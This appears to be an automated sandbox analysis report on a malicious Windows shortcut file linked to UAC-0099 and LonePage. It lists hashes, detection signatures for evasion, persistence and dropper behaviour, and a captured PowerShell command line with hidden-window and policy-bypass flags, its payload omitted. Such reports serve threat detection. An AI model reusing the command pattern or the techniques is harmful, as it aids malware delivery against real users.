Windows Analysis Report
XA5hQdlKVd.lnk
Overview
General Information
Sample name: XA5hQdlKVd.lnk (renamed because the original name is a hash value)
Original sample name: 0acd4a9ef18f3fd1ccf440879e768089d4dd2107e1ce19d2a17a59ebed8c7f5d.lnk
Analysis ID: 1522686
MD5: 4e37f3bbf59b456fb07dc71f3fc20dba
SHA1: 816ade8789655d00cc33d290a7d8f8c3321f80c0
SHA256: 0acd4a9ef18f3fd1ccf440879e768089d4dd2107e1ce19d2a17a59ebed8c7f5d
Tags: lnk, UAC-0099, user-JAMESWT_MHT
Detection
LonePage
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected LonePage
AI detected suspicious sample
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Potential dropper URLs found in powershell memory
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- powershell.exe (PID: 3540 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='<base64-encoded payload omitted>'